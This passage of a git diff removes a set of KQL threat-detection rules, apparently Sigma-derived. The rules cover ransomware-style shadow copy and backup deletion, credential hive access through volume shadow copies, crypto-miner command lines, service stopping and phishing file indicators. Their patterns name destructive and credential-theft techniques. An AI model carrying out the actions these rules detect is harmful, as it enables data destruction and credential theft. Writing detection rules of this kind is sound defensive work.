-// Level: medium
-// Description: Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dl" DLL. Which is often used by attackers to perform AD enumeration.
-// Tags: attack.reconnaissance, attack.discovery, attack.impact
-DeviceProcessEvents
-| where (ProcessCommandLine contains "Import-Module " or ProcessCommandLine contains "ipmo ") and ProcessCommandLine contains "Microsoft.ActiveDirectory.Management.dll" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/Impact/Potential_Crypto_Mining_Activity.kql b/Impact/Potential_Crypto_Mining_Activity.kql
deleted file mode 100644
index db2ab577..00000000
--- a/Impact/Potential_Crypto_Mining_Activity.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/10/26
-// Level: high
-// Description: Detects command line parameters or strings often used by crypto miners
-// Tags: attack.impact, attack.t1496
-DeviceProcessEvents
-| where (ProcessCommandLine contains " --cpu-priority=" or ProcessCommandLine contains "--donate-level=0" or ProcessCommandLine contains " -o pool." or ProcessCommandLine contains " --nicehash" or ProcessCommandLine contains " --algo=rx/0 " or ProcessCommandLine contains "stratum+tcp://" or ProcessCommandLine contains "stratum+udp://" or ProcessCommandLine contains "LS1kb25hdGUtbGV2ZWw9" or ProcessCommandLine contains "0tZG9uYXRlLWxldmVsP" or ProcessCommandLine contains "tLWRvbmF0ZS1sZXZlbD" or ProcessCommandLine contains "c3RyYXR1bSt0Y3A6Ly" or ProcessCommandLine contains "N0cmF0dW0rdGNwOi8v" or ProcessCommandLine contains "zdHJhdHVtK3RjcDovL" or ProcessCommandLine contains "c3RyYXR1bSt1ZHA6Ly" or ProcessCommandLine contains "N0cmF0dW0rdWRwOi8v" or ProcessCommandLine contains "zdHJhdHVtK3VkcDovL") and (not((ProcessCommandLine contains " pool.c " or ProcessCommandLine contains " pool.o " or ProcessCommandLine contains "gcc -")))
\ No newline at end of file
diff --git a/Impact/Potential_File_Overwrite_Via_Sysinternals_SDelete.kql b/Impact/Potential_File_Overwrite_Via_Sysinternals_SDelete.kql
deleted file mode 100644
index c44fdf46..00000000
--- a/Impact/Potential_File_Overwrite_Via_Sysinternals_SDelete.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/06/03
-// Level: high
-// Description: Detects the use of SDelete to erase a file not the free space
-// Tags: attack.impact, attack.t1485
-DeviceProcessEvents
-| where ProcessVersionInfoOriginalFileName =~ "sdelete.exe" and (not((ProcessCommandLine contains " -h" or ProcessCommandLine contains " -c" or ProcessCommandLine contains " -z" or ProcessCommandLine contains " /?")))
\ No newline at end of file
diff --git a/Impact/Potential_Ransomware_Activity_Using_LegalNotice_Message.kql b/Impact/Potential_Ransomware_Activity_Using_LegalNotice_Message.kql
deleted file mode 100644
index d3f81814..00000000
--- a/Impact/Potential_Ransomware_Activity_Using_LegalNotice_Message.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/12/11
-// Level: high
-// Description: Detect changes to the "LegalNoticeCaption" or "LegalNoticeText" registry values where the message set contains keywords often used in ransomware ransom messages
-// Tags: attack.impact, attack.t1491.001
-DeviceRegistryEvents
-| where (RegistryValueData contains "encrypted" or RegistryValueData contains "Unlock-Password" or RegistryValueData contains "paying") and (RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LegalNoticeCaption" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LegalNoticeText")
\ No newline at end of file
diff --git a/Impact/Potentially_Suspicious_Desktop_Background_Change_Using_Reg.EXE.kql b/Impact/Potentially_Suspicious_Desktop_Background_Change_Using_Reg.EXE.kql
deleted file mode 100644
index 04a1ecbd..00000000
--- a/Impact/Potentially_Suspicious_Desktop_Background_Change_Using_Reg.EXE.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Stephen Lincoln @slincoln-aiq (AttackIQ)
-// Date: 2023/12/21
-// Level: medium
-// Description: Detects the execution of "reg.exe" to alter registry keys that would replace the user's desktop background.
-This is a common technique used by malware to change the desktop background to a ransom note or other image.
-
-// Tags: attack.defense_evasion, attack.impact, attack.t1112, attack.t1491.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "add" and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")) and (ProcessCommandLine contains "Control Panel\\Desktop" or ProcessCommandLine contains "CurrentVersion\\Policies\\ActiveDesktop" or ProcessCommandLine contains "CurrentVersion\\Policies\\System") and ((ProcessCommandLine contains "/v NoChangingWallpaper" and ProcessCommandLine contains "/d 1") or (ProcessCommandLine contains "/v Wallpaper" and ProcessCommandLine contains "/t REG_SZ") or (ProcessCommandLine contains "/v WallpaperStyle" and ProcessCommandLine contains "/d 2"))
\ No newline at end of file
diff --git a/Impact/Potentially_Suspicious_Desktop_Background_Change_Via_Registry.kql b/Impact/Potentially_Suspicious_Desktop_Background_Change_Via_Registry.kql
deleted file mode 100644
index ea293a77..00000000
--- a/Impact/Potentially_Suspicious_Desktop_Background_Change_Via_Registry.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Stephen Lincoln @slincoln-aiq (AttackIQ)
-// Date: 2023/12/21
-// Level: medium
-// Description: Detects regsitry value settings that would replace the user's desktop background.
-This is a common technique used by malware to change the desktop background to a ransom note or other image.
-
-// Tags: attack.defense_evasion, attack.impact, attack.t1112, attack.t1491.001
-DeviceRegistryEvents
-| where (RegistryKey contains "Control Panel\\Desktop" or RegistryKey contains "CurrentVersion\\Policies\\ActiveDesktop" or RegistryKey contains "CurrentVersion\\Policies\\System") and ((RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "NoChangingWallpaper") or RegistryKey endswith "\\Wallpaper" or (RegistryValueData =~ "2" and RegistryKey endswith "\\WallpaperStyle")) and (not(InitiatingProcessFolderPath endswith "\\svchost.exe"))
\ No newline at end of file
diff --git a/Impact/Registry_Disable_System_Restore.kql b/Impact/Registry_Disable_System_Restore.kql
deleted file mode 100644
index 987d2564..00000000
--- a/Impact/Registry_Disable_System_Restore.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/04/04
-// Level: high
-// Description: Detects the modification of the registry to disable a system restore on the computer
-// Tags: attack.impact, attack.t1490
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey contains "\\Policies\\Microsoft\\Windows NT\\SystemRestore" or RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore") and (RegistryKey endswith "DisableConfig" or RegistryKey endswith "DisableSR")
\ No newline at end of file
diff --git a/Impact/Renamed_Gpg.EXE_Execution.kql b/Impact/Renamed_Gpg.EXE_Execution.kql
deleted file mode 100644
index 8b2e50af..00000000
--- a/Impact/Renamed_Gpg.EXE_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), frack113
-// Date: 2023/08/09
-// Level: high
-// Description: Detects the execution of a renamed "gpg.exe". Often used by ransomware and loaders to decrypt/encrypt data.
-// Tags: attack.impact, attack.t1486
-DeviceProcessEvents
-| where ProcessVersionInfoOriginalFileName =~ "gpg.exe" and (not((FolderPath endswith "\\gpg.exe" or FolderPath endswith "\\gpg2.exe")))
\ No newline at end of file
diff --git a/Impact/Renamed_Sysinternals_Sdelete_Execution.kql b/Impact/Renamed_Sysinternals_Sdelete_Execution.kql
deleted file mode 100644
index 85f47581..00000000
--- a/Impact/Renamed_Sysinternals_Sdelete_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/09/06
-// Level: high
-// Description: Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming)
-// Tags: attack.impact, attack.t1485
-DeviceProcessEvents
-| where ProcessVersionInfoOriginalFileName =~ "sdelete.exe" and (not((FolderPath endswith "\\sdelete.exe" or FolderPath endswith "\\sdelete64.exe")))
\ No newline at end of file
diff --git a/Impact/Sensitive_File_Access_Via_Volume_Shadow_Copy_Backup.kql b/Impact/Sensitive_File_Access_Via_Volume_Shadow_Copy_Backup.kql
deleted file mode 100644
index 61901361..00000000
--- a/Impact/Sensitive_File_Access_Via_Volume_Shadow_Copy_Backup.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)
-// Date: 2021/08/09
-// Level: high
-// Description: Detects a command that accesses the VolumeShadowCopy in order to extract sensitive files such as the Security or SAM registry hives or the AD database (ntds.dit)
-
-// Tags: attack.impact, attack.t1490
-DeviceProcessEvents
-| where ProcessCommandLine contains "\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy" and (ProcessCommandLine contains "\\NTDS.dit" or ProcessCommandLine contains "\\SYSTEM" or ProcessCommandLine contains "\\SECURITY")
\ No newline at end of file
diff --git a/Impact/Shadow_Copies_Deletion_Using_Operating_Systems_Utilities.kql b/Impact/Shadow_Copies_Deletion_Using_Operating_Systems_Utilities.kql
deleted file mode 100644
index ef8ae60e..00000000
--- a/Impact/Shadow_Copies_Deletion_Using_Operating_Systems_Utilities.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)
-// Date: 2019/10/22
-// Level: high
-// Description: Shadow Copies deletion using operating systems utilities
-// Tags: attack.defense_evasion, attack.impact, attack.t1070, attack.t1490
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "shadow" and ProcessCommandLine contains "delete") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\vssadmin.exe" or FolderPath endswith "\\diskshadow.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll", "wmic.exe", "VSSADMIN.EXE", "diskshadow.exe")))) or ((ProcessCommandLine contains "delete" and ProcessCommandLine contains "catalog" and ProcessCommandLine contains "quiet") and (FolderPath endswith "\\wbadmin.exe" or ProcessVersionInfoOriginalFileName =~ "WBADMIN.EXE")) or (((ProcessCommandLine contains "unbounded" or ProcessCommandLine contains "/MaxSize=") and (ProcessCommandLine contains "resize" and ProcessCommandLine contains "shadowstorage")) and (FolderPath endswith "\\vssadmin.exe" or ProcessVersionInfoOriginalFileName =~ "VSSADMIN.EXE"))
\ No newline at end of file
diff --git a/Impact/Stop_Windows_Service_Via_Net.EXE.kql b/Impact/Stop_Windows_Service_Via_Net.EXE.kql
deleted file mode 100644
index b06abb2a..00000000
--- a/Impact/Stop_Windows_Service_Via_Net.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/03/05
-// Level: low
-// Description: Detects the stopping of a Windows service via the "net" utility.
-// Tags: attack.impact, attack.t1489
-DeviceProcessEvents
-| where ProcessCommandLine contains " stop " and ((ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")) or (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe"))
\ No newline at end of file
diff --git a/Impact/Stop_Windows_Service_Via_PowerShell_Stop-Service.kql b/Impact/Stop_Windows_Service_Via_PowerShell_Stop-Service.kql
deleted file mode 100644
index d8555ff2..00000000
--- a/Impact/Stop_Windows_Service_Via_PowerShell_Stop-Service.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/03/05
-// Level: low
-// Description: Detects the stopping of a Windows service via the PowerShell Cmdlet "Stop-Service"
-// Tags: attack.impact, attack.t1489
-DeviceProcessEvents
-| where ProcessCommandLine contains "Stop-Service " and ((ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe"))
\ No newline at end of file
diff --git a/Impact/Stop_Windows_Service_Via_Sc.EXE.kql b/Impact/Stop_Windows_Service_Via_Sc.EXE.kql
deleted file mode 100644
index c9c45332..00000000
--- a/Impact/Stop_Windows_Service_Via_Sc.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/03/05
-// Level: low
-// Description: Detects the stopping of a Windows service via the "sc.exe" utility
-// Tags: attack.impact, attack.t1489
-DeviceProcessEvents
-| where ProcessCommandLine contains " stop " and (ProcessVersionInfoOriginalFileName =~ "sc.exe" or FolderPath endswith "\\sc.exe")
\ No newline at end of file
diff --git a/Impact/Suspicious_Creation_TXT_File_in_User_Desktop.kql b/Impact/Suspicious_Creation_TXT_File_in_User_Desktop.kql
deleted file mode 100644
index 14243c8b..00000000
--- a/Impact/Suspicious_Creation_TXT_File_in_User_Desktop.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/12/26
-// Level: high
-// Description: Ransomware create txt file in the user Desktop
-// Tags: attack.impact, attack.t1486
-DeviceFileEvents
-| where InitiatingProcessFolderPath endswith "\\cmd.exe" and (FolderPath contains "\\Users\\" and FolderPath contains "\\Desktop\\") and FolderPath endswith ".txt"
\ No newline at end of file
diff --git a/Impact/Suspicious_Execution_of_Shutdown.kql b/Impact/Suspicious_Execution_of_Shutdown.kql
deleted file mode 100644
index 1b1bcf08..00000000
--- a/Impact/Suspicious_Execution_of_Shutdown.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/01
-// Level: medium
-// Description: Use of the commandline to shutdown or reboot windows
-// Tags: attack.impact, attack.t1529
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/r " or ProcessCommandLine contains "/s ") and FolderPath endswith "\\shutdown.exe"
\ No newline at end of file
diff --git a/Impact/Suspicious_Execution_of_Shutdown_to_Log_Out.kql b/Impact/Suspicious_Execution_of_Shutdown_to_Log_Out.kql
deleted file mode 100644
index 7c380a20..00000000
--- a/Impact/Suspicious_Execution_of_Shutdown_to_Log_Out.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/10/01
-// Level: medium
-// Description: Detects the rare use of the command line tool shutdown to logoff a user
-// Tags: attack.impact, attack.t1529
-DeviceProcessEvents
-| where ProcessCommandLine contains "/l" and FolderPath endswith "\\shutdown.exe"
\ No newline at end of file
diff --git a/Impact/Suspicious_Reg_Add_BitLocker.kql b/Impact/Suspicious_Reg_Add_BitLocker.kql
deleted file mode 100644
index 9acc3570..00000000
--- a/Impact/Suspicious_Reg_Add_BitLocker.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/11/15
-// Level: high
-// Description: Detects suspicious addition to BitLocker related registry keys via the reg.exe utility
-// Tags: attack.impact, attack.t1486
-DeviceProcessEvents
-| where (ProcessCommandLine contains "EnableBDEWithNoTPM" or ProcessCommandLine contains "UseAdvancedStartup" or ProcessCommandLine contains "UseTPM" or ProcessCommandLine contains "UseTPMKey" or ProcessCommandLine contains "UseTPMKeyPIN" or ProcessCommandLine contains "RecoveryKeyMessageSource" or ProcessCommandLine contains "UseTPMPIN" or ProcessCommandLine contains "RecoveryKeyMessage") and (ProcessCommandLine contains "REG" and ProcessCommandLine contains "ADD" and ProcessCommandLine contains "\\SOFTWARE\\Policies\\Microsoft\\FVE" and ProcessCommandLine contains "/v" and ProcessCommandLine contains "/f")
\ No newline at end of file
diff --git a/Impact/Suspicious_Volume_Shadow_Copy_VSS_PS.dll_Load.kql b/Impact/Suspicious_Volume_Shadow_Copy_VSS_PS.dll_Load.kql
deleted file mode 100644
index 714a3039..00000000
--- a/Impact/Suspicious_Volume_Shadow_Copy_VSS_PS.dll_Load.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Markus Neis, @markus_neis
-// Date: 2021/07/07
-// Level: high
-// Description: Detects the image load of vss_ps.dll by uncommon executables
-// Tags: attack.defense_evasion, attack.impact, attack.t1490
-DeviceImageLoadEvents
-| where FolderPath endswith "\\vss_ps.dll" and (not((isnull(InitiatingProcessFolderPath) or ((InitiatingProcessFolderPath endswith "\\clussvc.exe" or InitiatingProcessFolderPath endswith "\\dismhost.exe" or InitiatingProcessFolderPath endswith "\\dllhost.exe" or InitiatingProcessFolderPath endswith "\\inetsrv\\appcmd.exe" or InitiatingProcessFolderPath endswith "\\inetsrv\\iissetup.exe" or InitiatingProcessFolderPath endswith "\\msiexec.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\searchindexer.exe" or InitiatingProcessFolderPath endswith "\\srtasks.exe" or InitiatingProcessFolderPath endswith "\\svchost.exe" or InitiatingProcessFolderPath endswith "\\System32\\SystemPropertiesAdvanced.exe" or InitiatingProcessFolderPath endswith "\\taskhostw.exe" or InitiatingProcessFolderPath endswith "\\thor.exe" or InitiatingProcessFolderPath endswith "\\thor64.exe" or InitiatingProcessFolderPath endswith "\\tiworker.exe" or InitiatingProcessFolderPath endswith "\\vssvc.exe" or InitiatingProcessFolderPath endswith "\\WmiPrvSE.exe" or InitiatingProcessFolderPath endswith "\\wsmprovhost.exe") and InitiatingProcessFolderPath startswith "C:\\Windows\\") or (InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\") or (InitiatingProcessCommandLine contains "\\dismhost.exe {" and InitiatingProcessCommandLine startswith "C:\\$WinREAgent\\Scratch\\"))))
\ No newline at end of file
diff --git a/Impact/Suspicious_Volume_Shadow_Copy_Vssapi.dll_Load.kql b/Impact/Suspicious_Volume_Shadow_Copy_Vssapi.dll_Load.kql
deleted file mode 100644
index 76697076..00000000
--- a/Impact/Suspicious_Volume_Shadow_Copy_Vssapi.dll_Load.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/10/31
-// Level: high
-// Description: Detects the image load of VSS DLL by uncommon executables
-// Tags: attack.defense_evasion, attack.impact, attack.t1490
-DeviceImageLoadEvents
-| where FolderPath endswith "\\vssapi.dll" and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\") or InitiatingProcessFolderPath startswith "C:\\ProgramData\\Package Cache\\" or ((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe")) or (InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\{" or InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\")))))
\ No newline at end of file
diff --git a/Impact/Suspicious_Volume_Shadow_Copy_Vsstrace.dll_Load.kql b/Impact/Suspicious_Volume_Shadow_Copy_Vsstrace.dll_Load.kql
deleted file mode 100644
index ddc53c62..00000000
--- a/Impact/Suspicious_Volume_Shadow_Copy_Vsstrace.dll_Load.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2023/02/17
-// Level: high
-// Description: Detects the image load of VSS DLL by uncommon executables
-// Tags: attack.defense_evasion, attack.impact, attack.t1490
-DeviceImageLoadEvents
-| where FolderPath endswith "\\vsstrace.dll" and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\") or ((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe")) or (InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\{" or InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\")))))
\ No newline at end of file
diff --git a/Impact/Windows_Backup_Deleted_Via_Wbadmin.EXE.kql b/Impact/Windows_Backup_Deleted_Via_Wbadmin.EXE.kql
deleted file mode 100644
index 6e4d7eae..00000000
--- a/Impact/Windows_Backup_Deleted_Via_Wbadmin.EXE.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021/12/13
-// Level: medium
-// Description: Detects the deletion of backups or system state backups via "wbadmin.exe".
-This technique is used by numerous ransomware families and actors.
-This may only be successful on server platforms that have Windows Backup enabled.
-
-// Tags: attack.impact, attack.t1490
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "delete " and ProcessCommandLine contains "backup") and (FolderPath endswith "\\wbadmin.exe" or ProcessVersionInfoOriginalFileName =~ "WBADMIN.EXE")) and (not(ProcessCommandLine contains "keepVersions:0"))
\ No newline at end of file
diff --git a/Initial Access/Arbitrary_Shell_Command_Execution_Via_Settingcontent-Ms.kql b/Initial Access/Arbitrary_Shell_Command_Execution_Via_Settingcontent-Ms.kql
deleted file mode 100644
index c2a5c681..00000000
--- a/Initial Access/Arbitrary_Shell_Command_Execution_Via_Settingcontent-Ms.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Sreeman
-// Date: 2020/03/13
-// Level: medium
-// Description: The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create "shortcuts" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.
-// Tags: attack.t1204, attack.t1566.001, attack.execution, attack.initial_access
-DeviceProcessEvents
-| where ProcessCommandLine contains ".SettingContent-ms" and (not(ProcessCommandLine contains "immersivecontrolpanel"))
\ No newline at end of file
diff --git a/Initial Access/HTML_Help_HH.EXE_Suspicious_Child_Process.kql b/Initial Access/HTML_Help_HH.EXE_Suspicious_Child_Process.kql
deleted file mode 100644
index 25771e32..00000000
--- a/Initial Access/HTML_Help_HH.EXE_Suspicious_Child_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Maxim Pavlunin, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2020/04/01
-// Level: high
-// Description: Detects a suspicious child process of a Microsoft HTML Help (HH.exe)
-// Tags: attack.defense_evasion, attack.execution, attack.initial_access, attack.t1047, attack.t1059.001, attack.t1059.003, attack.t1059.005, attack.t1059.007, attack.t1218, attack.t1218.001, attack.t1218.010, attack.t1218.011, attack.t1566, attack.t1566.001
-DeviceProcessEvents
-| where (FolderPath endswith "\\CertReq.exe" or FolderPath endswith "\\CertUtil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\installutil.exe" or FolderPath endswith "\\MSbuild.exe" or FolderPath endswith "\\MSHTA.EXE" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\hh.exe"
\ No newline at end of file
diff --git a/Initial Access/ISO_File_Created_Within_Temp_Folders.kql b/Initial Access/ISO_File_Created_Within_Temp_Folders.kql
deleted file mode 100644
index faa3924b..00000000
--- a/Initial Access/ISO_File_Created_Within_Temp_Folders.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: @sam0x90
-// Date: 2022/07/30
-// Level: high
-// Description: Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022.
-// Tags: attack.initial_access, attack.t1566.001
-DeviceFileEvents
-| where ((FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath contains ".zip\\") and FolderPath endswith ".iso") or (FolderPath contains "\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Content.Outlook\\" and FolderPath endswith ".iso")
\ No newline at end of file
diff --git a/Initial Access/ISO_or_Image_Mount_Indicator_in_Recent_Files.kql b/Initial Access/ISO_or_Image_Mount_Indicator_in_Recent_Files.kql
deleted file mode 100644
index ca6ce719..00000000
--- a/Initial Access/ISO_or_Image_Mount_Indicator_in_Recent_Files.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/02/11
-// Level: medium
-// Description: Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks.
-This can be a false positive on server systems but on workstations users should rarely mount .iso or .img files.
-
-// Tags: attack.initial_access, attack.t1566.001
-DeviceFileEvents
-| where FolderPath contains "\\Microsoft\\Windows\\Recent\\" and (FolderPath endswith ".iso.lnk" or FolderPath endswith ".img.lnk" or FolderPath endswith ".vhd.lnk" or FolderPath endswith ".vhdx.lnk")
\ No newline at end of file
diff --git a/Initial Access/Office_Macro_File_Creation.kql b/Initial Access/Office_Macro_File_Creation.kql
deleted file mode 100644
index befbebcf..00000000
--- a/Initial Access/Office_Macro_File_Creation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/01/23
-// Level: low
-// Description: Detects the creation of a new office macro files on the systems
-// Tags: attack.initial_access, attack.t1566.001
-DeviceFileEvents
-| where FolderPath endswith ".docm" or FolderPath endswith ".dotm" or FolderPath endswith ".xlsm" or FolderPath endswith ".xltm" or FolderPath endswith ".potm" or FolderPath endswith ".pptm"
\ No newline at end of file
diff --git a/Initial Access/Office_Macro_File_Creation_From_Suspicious_Process.kql b/Initial Access/Office_Macro_File_Creation_From_Suspicious_Process.kql
deleted file mode 100644
index e74caaca..00000000
--- a/Initial Access/Office_Macro_File_Creation_From_Suspicious_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/01/23
-// Level: high
-// Description: Detects the creation of a office macro file from a a suspicious process
-// Tags: attack.initial_access, attack.t1566.001
-DeviceFileEvents
-| where ((InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") or (InitiatingProcessParentFileName in~ ("cscript.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe", "wscript.exe"))) and (FolderPath endswith ".docm" or FolderPath endswith ".dotm" or FolderPath endswith ".xlsm" or FolderPath endswith ".xltm" or FolderPath endswith ".potm" or FolderPath endswith ".pptm")
\ No newline at end of file
diff --git a/Initial Access/Office_Macro_File_Download.kql b/Initial Access/Office_Macro_File_Download.kql
deleted file mode 100644
index e589acbc..00000000
--- a/Initial Access/Office_Macro_File_Download.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/01/23
-// Level: medium
-// Description: Detects the creation of a new office macro files on the systems via an application (browser, mail client).
-// Tags: attack.initial_access, attack.t1566.001
-DeviceFileEvents
-| where ((FolderPath endswith ".docm" or FolderPath endswith ".dotm" or FolderPath endswith ".xlsm" or FolderPath endswith ".xltm" or FolderPath endswith ".potm" or FolderPath endswith ".pptm") or (FolderPath contains ".docm:Zone" or FolderPath contains ".dotm:Zone" or FolderPath contains ".xlsm:Zone" or FolderPath contains ".xltm:Zone" or FolderPath contains ".potm:Zone" or FolderPath contains ".pptm:Zone")) and (InitiatingProcessFolderPath endswith "\\RuntimeBroker.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\thunderbird.exe" or InitiatingProcessFolderPath endswith "\\brave.exe" or InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\iexplore.exe" or InitiatingProcessFolderPath endswith "\\maxthon.exe" or InitiatingProcessFolderPath endswith "\\MicrosoftEdge.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe" or InitiatingProcessFolderPath endswith "\\opera.exe" or InitiatingProcessFolderPath endswith "\\safari.exe" or InitiatingProcessFolderPath endswith "\\seamonkey.exe" or InitiatingProcessFolderPath endswith "\\vivaldi.exe" or InitiatingProcessFolderPath endswith "\\whale.exe")
\ No newline at end of file
diff --git a/Initial Access/Password_Provided_In_Command_Line_Of_Net.EXE.kql b/Initial Access/Password_Provided_In_Command_Line_Of_Net.EXE.kql
deleted file mode 100644
index 5662813f..00000000
--- a/Initial Access/Password_Provided_In_Command_Line_Of_Net.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tim Shelton (HAWK.IO)
-// Date: 2021/12/09
-// Level: medium
-// Description: Detects a when net.exe is called with a password in the command line
-// Tags: attack.defense_evasion, attack.initial_access, attack.persistence, attack.privilege_escalation, attack.lateral_movement, attack.t1021.002, attack.t1078
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " use " and (ProcessCommandLine contains ":" and ProcessCommandLine contains "\\") and (ProcessCommandLine contains "/USER:" and ProcessCommandLine contains " ")) and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))) and (not(ProcessCommandLine endswith " "))
\ No newline at end of file
